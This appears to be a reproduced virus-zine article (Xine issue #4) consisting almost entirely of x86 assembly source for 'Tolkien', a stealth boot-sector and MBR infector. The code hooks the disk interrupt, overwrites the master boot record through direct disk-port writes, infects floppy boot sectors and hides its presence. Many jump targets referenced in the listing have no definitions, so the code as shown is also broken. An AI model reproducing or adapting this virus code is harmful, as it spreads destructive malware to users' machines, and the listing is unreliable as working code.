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Xine - issue #4 - Phile 307

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 · 7 months ago

| Xine - issue #4 - Phile 307 |

; VIRUS : Tolkien
; AUTHOR : Int13h
; ORIGIN : Paraguay, Sudam‚rica
; LONGITUD: 512 bytes, 1 sector
; DESCRIP.: Stealth BS/MBR infector. Uses HD ports. Some anti-heuristic.
; Dedicated to J.R.R. Tolkien for his great books.

Tolkien Segment
assume cs:Tolkien,ds:Tolkien,es:Tolkien,ss:Tolkien
org 0

db 0ebh,03ch,090h,04dh,053h,044h,04fh,053h,035h,02eh,030h,000h,002h,001h
db 001h,000h,002h,0e0h,000h,040h,00bh,0f0h,009h,000h,012h,000h,002h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,029h,0f8h,014h,034h
db 031h,04eh,04fh,020h,04eh,0cdh,010h,045h,020h,020h,020h,020h,046h,041h
db 054h,031h,032h,020h,020h,020h

xor ax,ax
mov ss,ax
mov sp,07c00h
push ss
pop ds

mov si,sp

mov cx,6
mov bp,0824h
ror bp,1
sub di,di
inc bp

mov ax,word ptr ss:[bp]
add ax,-1
mov word ptr ds:[bp],ax

mov bx,offset Al_Cosmos
shl ax,cl
mov cx,0cbfeh
push ax
push ax
xor cx,0cafeh
pop es
push bx
repe movsw

xchg word ptr ds:[04eh],ax
mov word ptr cs:[Seg_CD13],ax
mov ax,offset New13Handler
xchg word ptr ds:[04ch],ax
mov word ptr cs:[Off_CD13],ax

mov ax,0201h
mov bx,200h
mov dx,0080h
mov cx,1
call dword ptr cs:[Off_CD13]
jc Lets_Go

cmp word ptr cs:[bx+offset Marca],'!!'
je Lets_Go

mov byte ptr cs:[Habitat],'H'
push ds
push es
pop ds

cmp word ptr cs:[bx+04bh],04b4h
je Asuncion_Virus_Found

mov ax,0301h
mov bx,200h
mov dx,0080h
mov cx,0002h
call dword ptr cs:[Off_CD13]

xor bx,bx
mov si,offset Tabla_Outs

mov dx,01f2h
mov cx,6
inc dx
loop $-2

in al,dx
test al,8
jz $-3

mov si,bx
mov cx,256
mov dx,1f0h
repe outsw

pop ds
mov byte ptr cs:[Habitat],'F'

push ds
pop es

cmp byte ptr cs:[Habitat],'F'
je Floppy

mov cx,0002h
mov dx,0080h
jmp short Load_Original

mov cx,000eh
mov dx,0100h

mov ax,0201h
mov bx,07c00h
int 13h
db 0eah
dw 07c00h
dw 0

push ax
pop ax
and ah,11111110b
push ax
pop ax
xor ah,0bah
cmp ah,(02h xor 0bah)
jnz Normal
cmp cx,0001h
jnz Normal
or dx,dx
jz Infectar
cmp dx,0080h
jz Stealth_MBR

xor ah,0bah
db 0eah
Off_CD13 dw 0
Seg_CD13 dw 0
Marca db '!!'

xor ah,0bah
push cx
mov cl,02h
int 13h
pop cx
retf 2

push ax cx dx
mov ax,0201h
mov cx,000eh
mov dx,0100h
call dword ptr cs:[Off_CD13]
pop dx cx ax
retf 2

xor ah,0bah
call dword ptr cs:[Off_CD13]
jc See_You

cmp word ptr es:[bx+offset Marca],'!!'
je Stealth_BS

cmp word ptr es:[bx+13h],0b40h
jne See_You

push ax bx cx si di

mov ax,word ptr es:[bx+04bh]

push es ds es
pop ds
mov word ptr ds:[bx+02fh],010cdh
push cs
pop es
lea si,[bx+3]
mov di,3
mov cx,3bh
rep movsb
pop ds es

cmp ax,04b4h
je Asuncion_Virus_Installed

mov ax,0301h
mov cx,000eh
mov dx,0100h
call dword ptr cs:[Off_CD13]

mov ax,0301h
mov cx,1
sub dx,dx
sub bx,bx
push es cs
pop es
call dword ptr cs:[Off_CD13]
pop es

pop di si cx bx ax
retf 2

Habitat db 'F'
Tabla_Outs db 1,1,0,0,0a0h,030h
db ' ' xor 66+6
db '[' xor 66+6
db 'T' xor 66+6
db 'O' xor 66+6
db 'L' xor 66+6
db 'K' xor 66+6
db 'I' xor 66+6
db 'E' xor 66+6
db 'N' xor 66+6
db ']' xor 66+6
db ' ' xor 66+6
db 'b' xor 66+6
db 'y' xor 66+6
db ' ' xor 66+6
db 'I' xor 66+6
db 'n' xor 66+6
db 't' xor 66+6
db '1' xor 66+6
db '3' xor 66+6
db 'h' xor 66+6
db '!' xor 66+6
db ' ' xor 66+6
db '<' xor 66+6
db '<' xor 66+6
db 'P' xor 66+6
db 'A' xor 66+6
db 'R' xor 66+6
db 'A' xor 66+6
db 'G' xor 66+6
db 'U' xor 66+6
db 'A' xor 66+6
db 'Y' xor 66+6
db ' ' xor 66+6
db '1' xor 66+6
db '9' xor 66+6
db '9' xor 66+6
db '8' xor 66+6
db '>' xor 66+6
db '>' xor 66+6
db 1 xor 66+6
db 2 xor 66+6
org 01feh
db 055h,0aah
org 0200h

Tolkien ends
End Inicio

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